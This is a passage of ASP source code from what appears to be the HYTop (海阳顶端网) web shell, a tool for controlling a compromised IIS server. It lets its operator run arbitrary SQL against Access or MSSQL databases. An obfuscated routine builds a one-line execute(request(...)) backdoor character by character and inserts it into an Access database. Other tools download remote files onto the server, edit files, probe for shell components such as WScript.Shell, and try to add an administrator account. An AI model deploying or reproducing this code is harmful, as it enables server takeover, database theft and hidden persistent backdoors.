📄 123.asp
字号:
sqlStr = Session(m & "sqlStr")
End If
End If
Session(m & "sqlStr") = sqlStr
echo "<style>body{margin:8;}</style>"
echo "<form method=post action='?pageName=MsDataBase&theAct=showTables' onSubmit='this.Submit.disabled=true;'>"
echo "<a href='?pageName=MsDataBase'>mdb+mssql数据库操作</a><br/>"
echo "<input name=sqlStr type=text id=sqlStr value=""" & sqlStr & """ size=60 style='width:80%;'>"
echo "<input name=theAct type=hidden value=showTables><br/>"
echo "<input type=Submit name=Submit value=' 提交 '>"
echo "<input type=button name=Submit2 value=' 插入 ' onclick=""if(confirm('这里是在ACESS数据里插入海阳顶端网ASP后门\n默认密码是" & clientPassword & "\n后门插入后可以使用的前提是\n数据库是asp后缀, 并且没有错乱asp代码\n确认操作吗?')){location.href='?pageName=MsDataBase&theAct=inject&sqlStr='+this.form.sqlStr.value;this.disabled=true;}"">"
echo "<input type=button value=' 示例 ' onclick=""this.form.sqlStr.value='e:\\HYTop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;';"">"
echo "</form>"
echo "<hr/>注: 插入只针对ACCESS操作, 要浏览ACCESS在表单中的写法是""d:\bbs.mdb"", SQL据库写法是""sql:连接字符串"", 不要忘写sql:。<hr/>"
Select Case theAct
Case "showTables"
showTables()
Case "query"
showQuery()
Case "inject"
accessInject()
End Select
echo "Powered By Marcos 2005.02"
End Sub
Sub showTables()
If isDebugMode = False Then
On Error Resume Next
End If
Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
sqlStr = Request("sqlStr")
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set conn = Server.CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "<a href=""?pageName=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>转到SQL命令执行</a><hr/>"
Do Until rsTable.Eof
Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
echo "<table border=0 cellpadding=0 cellspacing=0><tr><td height=22 colspan=6><b>" & rsTable("Table_Name") & "</b></td>"
echo "</tr><tr><td colspan=6><hr/></td></tr><tr align=center>"
echo "<td>字段名</td><td>类型</td><td>大小</td><td>精度</td><td>允许为空</td><td>默认值</td></tr>"
echo "<tr><td colspan=6><hr/></td></tr>"
Do Until rsColumn.Eof
echo "<tr align=center>"
echo "<td align=Left> " & rsColumn("Column_Name") & "</td>"
echo "<td width=80>" & getDataType(rsColumn("Data_Type")) & "</td>"
echo "<td width=70>" & rsColumn("Character_Maximum_Length") & "</td>"
echo "<td width=70>" & rsColumn("Numeric_Precision") & "</td>"
echo "<td width=70>" & rsColumn("Is_Nullable") & "</td>"
echo "<td width=80>" & rsColumn("Column_Default") & "</td>"
echo "</tr>"
rsColumn.MoveNext
Loop
echo "<tr><td colspan=6><hr/></td></tr></table>"
rsTable.MoveNext
Loop
echo "<hr/>"
conn.Close
Set conn = Nothing
Set rsTable = Nothing
Set rsColumn = Nothing
End Sub
Sub showQuery()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
sql = Request("sql")
page = Request("page")
sqlStr = Request("sqlStr")
theTable = Request("theTable")
If Not IsNumeric(page) or page = "" Then
page = 1
End If
If sql = "" And theTable <> "" Then
sql = "Select top 10 * from [" & theTable & "]"
End If
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = Server.CreateObject("Adodb.RecordSet")
Set conn = Server.CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "<a href=""?pageName=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & ">SQL命令执行及查看</a>"
echo "<br/><form method=post action=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>"
echo "<input name=sql type=text id=sql value=""" & HtmlEncode(sql) & """ size=60>"
echo "<input type=Submit name=Submit4 value=执行查询><hr/>"
If sql <> "" And Left(LCase(sql), 7) = "select " Then
rs.Open sql, conn, 1, 1
chkErr(Err)
rs.PageSize = 20
If Not rs.Eof Then
rs.AbsolutePage = page
End If
If rs.Fields.Count>0 Then
echo "<br><table border=""1"" cellpadding=""0"" cellspacing=""0"" width=""98%"">"
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""tr"" colspan=""" & rs.Fields.Count & """>SQL操作 - 执行结果</td>"
echo "</tr>"
echo "<tr>"
For j = 0 To rs.Fields.Count-1
echo "<td height=""22"" align=""center"" class=""td""> " & rs.Fields(j).Name & " </td>"
Next
For i = 1 To 20
If rs.Eof Then
Exit For
End If
echo "</tr>"
echo "<tr valign=top>"
For j = 0 To rs.Fields.Count-1
echo "<td height=""22"" align=""center"">" & HtmlEncode(fixNull(rs(j))) & "</td>"
Next
echo "</tr>"
rs.MoveNext
Next
End If
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""td"" colspan=""" & rs.Fields.Count & """>"
For i = 1 To rs.PageCount
echo Replace("<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & "&page=" & i & """><font {$font" & i & "}>" & i & "</font></a> ", "{$font" & page & "}", "class=warningColor")
Next
echo "</td></tr></table>"
rs.Close
Else
If sql <> "" Then
conn.Execute(sql)
chkErr(Err)
echo "<center><br>执行完毕!</center>"
End If
End If
echo "</form><hr/>"
conn.Close
Set rs = Nothing
Set conn = Nothing
Set rsTable = Nothing
End Sub
Function getDataType(typeId)
Select Case typeId
Case 130
getDataType = "文本"
Case 2
getDataType = "整型"
Case 3
getDataType = "长整型"
Case 7
getDataType = "日期/时间"
Case 5
getDataType = "双精度型"
Case 11
getDataType = "是/否"
Case 128
getDataType = "OLE 对象"
Case Else
getDataType = typeId
End Select
End Function
Sub accessInject()
If isDebugMode = False Then
On Error Resume Next
End If
Dim rs, conn, sqlStr, connStr
sqlStr = Request("sqlStr")
If LCase(Left(sqlStr, 4)) = "sql:" Then
showErr("插入只对ACCESS数据库有效!")
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = Server.CreateObject("Adodb.RecordSet")
Set conn = Server.CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
If notdownloadsExists = True Then
conn.Execute("drop table notdownloads")
End If
conn.Execute("create table notdownloads(notdownloads oleobject)")
rs.Open "notdownloads", conn, 1, 3
rs.AddNew
rs("notdownloads").AppendChunk(ChrB(Asc("<")) & ChrB(Asc("%")) & ChrB(Asc("e")) & ChrB(Asc("x")) & ChrB(Asc("e")) & ChrB(Asc("c")) & ChrB(Asc("u")) & ChrB(Asc("t")) & ChrB(Asc("e")) & ChrB(Asc("(")) & ChrB(Asc("r")) & ChrB(Asc("e")) & ChrB(Asc("q")) & ChrB(Asc("u")) & ChrB(Asc("e")) & ChrB(Asc("s")) & ChrB(Asc("t")) & ChrB(Asc("(")) & ChrB(Asc("""")) & ChrB(Asc(clientPassword)) & ChrB(Asc("""")) & ChrB(Asc(")")) & ChrB(Asc(")")) & ChrB(Asc("%")) & ChrB(Asc(">")) & ChrB(Asc(" ")))
rs.Update
rs.Close
echo "<script language=""javascript"">alert('插入成功!');history.back();</script>"
conn.Close
Set rs = Nothing
Set conn = Nothing
End Sub
Function getTableList(conn, sqlStr, rsTable)
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
Do Until rsTable.Eof
getTableList = getTableList & "<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&theTable=" & UrlEncode(rsTable("Table_Name")) & """>[" & rsTable("Table_Name") & "]</a> "
rsTable.MoveNext
Loop
rsTable.MoveFirst
End Function
Sub PageObjOnSrv()
Dim i, objTmp, txtObjInfo, strObjectList, strDscList
txtObjInfo = Trim(Request("txtObjInfo"))
strObjectList = "MSWC.AdRotator,MSWC.BrowserType,MSWC.NextLink,MSWC.Tools,MSWC.Status,MSWC.Counters,IISSample.ContentRotator," & _
"IISSample.PageCounter,MSWC.PermissionChecker,Adodb.Connection,SoftArtisans.FileUp,SoftArtisans.FileManager,LyfUpload.UploadFile," & _
"Persits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persits.MailSender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer," & _
"IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtisans.ImageGen,W3Image.Image," & _
"Scripting.FileSystemObject,Adodb.Stream,Shell.Application,WScript.Shell,Wscript.Network"
strDscList = "广告轮换,浏览器信息,内容链接库,,,计数器,内容轮显,,权限检测,ADO 数据对象,SA-FileUp 文件上传,SoftArtisans 文件管理," & _
"刘云峰的文件上传组件,ASPUpload 文件上传,Dimac 文件上传,Dimac JMail 邮件收发,虚拟 SMTP 发信,ASPemail 发信,ASPmail 发信,dkQmail 发信," & _
"Geocel 发信,IISmail 发信,SmtpMail 发信,SA 的图像读写,Dimac 的图像读写组件," & _
"FSO,Stream 流,,,"
aryObjectList = Split(strObjectList, ",")
aryDscList = Split(strDscList, ",")
showTitle("服务器组件支持情况检测")
echo "其他组件支持情况检测<br/>"
echo "在下面的输入框中输入你要检测的组件的ProgId或ClassId。<br/>"
echo "<form method=post>"
echo "<input name=txtObjInfo size=30 value=""" & txtObjInfo & """><input name=theAct type=submit value=我要检测>"
echo "</form>"
If Request("theAct") = "我要检测" And txtObjInfo <> "" Then
Call getObjInfo(txtObjInfo, "")
End If
echo "<hr/>"
echo "<lu>组件名称 ┆ 支持及其它"
For i = 0 To UBound(aryDscList)
Call getObjInfo(aryObjectList(i), aryDscList(i))
Next
echo "</lu><hr/>Powered By Marcos 2005.02"
End Sub
Sub getObjInfo(strObjInfo, strDscInfo)
Dim objTmp
If isDebugMode = False Then
On Error Resume Next
End If
echo "<li> " & strObjInfo
If strDscInfo <> "" Then
echo " (" & strDscInfo & "组件)"
End If
echo " ┆ "
Set objTmp = Server.CreateObject(strObjInfo)
If Err <> -2147221005 Then
echo "√ "
echo "Version: " & objTmp.Version & "; "
echo "About: " & objTmp.About
Else
echo "×"
End If
echo "</li>"
If Err Then
Err.Clear
End If
Set objTmp = Nothing
End Sub
Sub PageOtherTools()
Dim theAct
theAct = Request("theAct")
showTitle("一些零碎的小东西")
Select Case theAct
Case "downFromUrl"
downFromUrl()
Response.End
Case "addUser"
AddUser Request("userName"), Request("passWord")
Response.End
Case "readReg"
readReg()
Response.End
End Select
echo "数制转换:<hr/>"
echo "<input name=text1 value=字符和数字转10和16进制 size=25 id=text9>"
echo "<input type=button onclick=main(); value=给我转>"
echo "<input value=16进制转10进制和字符 size=25 id=vars>"
echo "<input type=button onClick=main2(); value=给我转>"
echo "<hr/>"
echo "下载到服务器:<hr/>"
echo "<form method=post target=_blank>"
echo "<input name=theUrl value='http://' size=80><input type=submit value=' 下载 '><br/>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
echo "<input type=checkbox name=overWrite value=2>存在覆盖"
echo "<input type=hidden value=downFromUrl name=theAct>"
echo "</form>"
echo "<hr/>"
echo "文件编辑:<hr/>"
echo "<form method=post action='?' target=_blank>"
echo "<input size=80 name=thePath value=""" & HtmlEncode(Request.ServerVariables("PATH_TRANSLATED")) & """>"
echo "<input type=hidden value=showEdit name=theAct>"
echo "<select name=pageName><option value=AppFileExplorer>用Stream</option><option value=FsoFileExplorer>用FSO</option></select>"
echo "<input type=submit value=' 打开 '>"
echo "</form><hr/>"
echo "管理帐号添加(成功率极低):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=addUser name=theAct>"
echo "<input name=userName value='HYTop' size=39>"
echo "<input name=passWord type=password value='HYTop' size=39>"
echo "<input type=submit value=' 添加 '>"
echo "</form><hr/>"
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -